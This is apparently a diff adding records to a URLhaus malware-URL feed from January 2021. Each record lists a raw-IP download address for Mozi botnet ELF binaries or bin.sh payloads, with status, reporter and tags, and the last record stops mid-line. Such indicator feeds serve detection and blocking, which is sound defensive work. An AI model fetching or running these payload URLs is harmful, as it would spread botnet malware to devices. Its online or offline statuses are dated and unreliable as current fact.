+{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://115.58.166.75:59976/bin.sh","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://125.44.61.35:48291/i","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://42.230.84.239:45797/Mozi.m","url_status":"online","host":"42.230.84.239","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://61.53.222.100:43741/bin.sh","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://59.93.21.58:35446/Mozi.a","url_status":"offline","host":"59.93.21.58","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://59.88.231.198:35720/Mozi.m","url_status":"online","host":"59.88.231.198","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://59.96.37.115:50501/Mozi.m","url_status":"offline","host":"59.96.37.115","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://119.118.75.183:55796/Mozi.m","url_status":"online","host":"119.118.75.183","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://175.206.182.103:52308/Mozi.m","url_status":"online","host":"175.206.182.103","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://117.222.162.104:59154/Mozi.m","url_status":"offline","host":"117.222.162.104","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://122.188.192.87:57950/Mozi.m","url_status":"online","host":"122.188.192.87","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://222.141.8.40:33520/Mozi.m","url_status":"online","host":"222.141.8.40","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://123.14.202.127:45525/Mozi.m","url_status":"online","host":"123.14.202.127","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://41.86.21.38:38430/Mozi.m","url_status":"online","host":"41.86.21.38","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://220.125.119.207:4096/Mozi.m","url_status":"online","host":"220.125.119.207","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://121.150.209.136:50631/Mozi.a","url_status":"online","host":"121.150.209.136","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://186.33.122.85:37989/Mozi.m","url_status":"online","host":"186.33.122.85","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://219.157.253.54:54078/Mozi.m","url_status":"online","host":"219.157.253.54","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://219.154.108.170:34201/i","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://115.59.119.91:56573/Mozi.m","url_status":"online","host":"115.59.119.91","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://125.44.61.35:48291/bin.sh","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://59.92.217.195:60102/Mozi.m","url_status":"online","host":"59.92.217.195","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://59.92.183.181:52225/Mozi.m","url_status":"offline","host":"59.92.183.181","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://59.99.95.7:56733/Mozi.m","url_status":"offline","host":"59.99.95.7","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://58.249.82.105:57042/Mozi.m","url_status":"online","host":"58.249.82.105","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://59.99.188.73:38035/Mozi.m","url_status":"offline","host":"59.99.188.73","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://42.228.238.118:33540/Mozi.m","url_status":"online","host":"42.228.238.118","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://42.238.236.187:51947/Mozi.m","url_status":"online","host":"42.238.236.187","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://186.33.123.28:36915/Mozi.m","url_status":"online","host":"186.33.123.28","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://182.116.84.95:38865/Mozi.m","url_status":"online","host":"182.116.84.95","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://103.217.123.186:55480/Mozi.m","url_status":"offline","host":"103.217.123.186","date_added":"2021-01-14 18:04:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://182.136.98.81:51996/Mozi.m","url_status":"offline","host":"182.136.98.81","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://125.47.250.69:36042/Mozi.m","url_status":"offline","host":"125.47.250.69","date_added":"2021-01-14 18:04:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://222.137.96.31:34350/Mozi.m","url_status":"offline","host":"222.137.96.31","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://223.130.29.204:53587/Mozi.m","url_status":"offline","host":"223.130.29.204","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://61.52.28.142:53444/Mozi.m","url_status":"online","host":"61.52.28.142","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://120.85.254.107:58653/Mozi.m","url_status":"online","host":"120.85.254.107","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://202.164.139.218:50579/Mozi.m","url_status":"offline","host":"202.164.139.218","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://114.199.216.11:3553/Mozi.m","url_status":"offline","host":"114.199.216.11","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://112.241.208.20:35288/Mozi.a","url_status":"online","host":"112.241.208.20","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://186.33.104.10:46429/Mozi.m","url_status":"online","host":"186.33.104.10","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://59.96.37.179:44575/Mozi.m","url_status":"offline","host":"59.96.37.179","date_added":"2021-01-14 18:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://125.42.236.165:43245/Mozi.m","url_status":"online","host":"125.42.236.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://117.242.211.165:50444/Mozi.m","url_status":"offline","host":"117.242.211.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://115.63.134.203:51318/Mozi.m","url_status":"online","host":"115.63.134.203","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://123.4.89.190:46221/Mozi.m","url_status":"online","host":"123.4.89.190","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://123.9.108.157:51430/Mozi.m","url_status":"online","host":"123.9.108.157","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://115.48.160.11:52028/Mozi.m","url_status":"online","host":"115.48.160.11","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://125.44.61.35:48291/Mozi.a","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://202.164.138.170:39613/Mozi.m","url_status":"offline","host":"202.164.138.170","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://219.154.108.170:34201/bin.sh","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://220.135.95.248:47095/Mozi.a","url_status":"online","host":"220.135.95.248","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://42.239.154.85:42004/Mozi.m","url_status":"online","host":"42.239.154.85","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://27.203.185.42:52058/Mozi.m","url_status":"online","host":"27.203.185.42","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://39.80.186.173:45432/Mozi.m","url_status":"online","host":"39.80.186.173","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://61.52.34.132:49891/Mozi.m","url_status":"online","host":"61.52.34.132","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://61.54.41.216:34334/Mozi.m","url_status":"online","host":"61.54.41.216","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://186.33.104.202:42886/Mozi.m","url_status":"online","host":"186.33.104.202","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://189.51.107.141:47096/Mozi.m","url_status":"offline","host":"189.51.107.141","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://182.126.81.19:48214/Mozi.a","url_status":"online","host":"182.126.81.19","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://186.33.122.192:40478/Mozi.m","url_status":"offline","host":"186.33.122.192","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://182.121.200.78:37771/Mozi.m","url_status":"online","host":"182.121.200.78","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://182.124.24.207:35513/Mozi.m","url_status":"online","host":"182.124.24.207","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://125.43.32.14:53382/Mozi.m","url_status":"online","host":"125.43.32.14","date_added":"2021-01-14 17:51:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://115.55.129.18:50336/Mozi.m","url_status":"online","host":"115.55.129.18","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://116.73.59.171:34233/Mozi.a","url_status":"offline","host":"116.73.59.171","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://117.208.132.85:38392/Mozi.m","url_status":"online","host":"117.208.132.85","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://117.222.173.218:52654/Mozi.m","url_status":"offline","host":"117.222.173.218","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://117.247.200.9:60203/Mozi.m","url_status":"offline","host":"117.247.200.9","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://120.85.187.191:48091/Mozi.a","url_status":"online","host":"120.85.187.191","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://111.241.105.88:40783/Mozi.m","url_status":"offline","host":"111.241.105.88","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://113.88.36.206:52015/Mozi.m","url_status":"online","host":"113.88.36.206","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://59.99.143.251:42987/Mozi.m","url_status":"offline","host":"59.99.143.251","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://59.94.180.106:53388/Mozi.m","url_status":"offline","host":"59.94.180.106","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://36.224.231.40:44124/Mozi.a","url_status":"online","host":"36.224.231.40","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://223.212.211.103:33802/Mozi.m","url_status":"online","host":"223.212.211.103","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://59.99.95.124:43806/Mozi.m","url_status":"offline","host":"59.99.95.124","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://59.97.169.13:52278/Mozi.m","url_status":"offline","host":"59.97.169.13","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://39.64.134.162:41202/Mozi.m","url_status":"online","host":"39.64.134.162","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://182.117.84.206:35756/Mozi.m","url_status":"online","host":"182.117.84.206","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://186.33.123.61:40569/Mozi.m","url_status":"online","host":"186.33.123.61","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://182.112.20.174:47645/Mozi.m","url_status":"online","host":"182.112.20.174","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://123.13.77.167:40023/Mozi.m","url_status":"online","host":"123.13.77.167","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://115.48.204.10:53402/Mozi.m","url_status":"online","host":"115.48.204.10","date_added":"2021-01-14 17:34:08 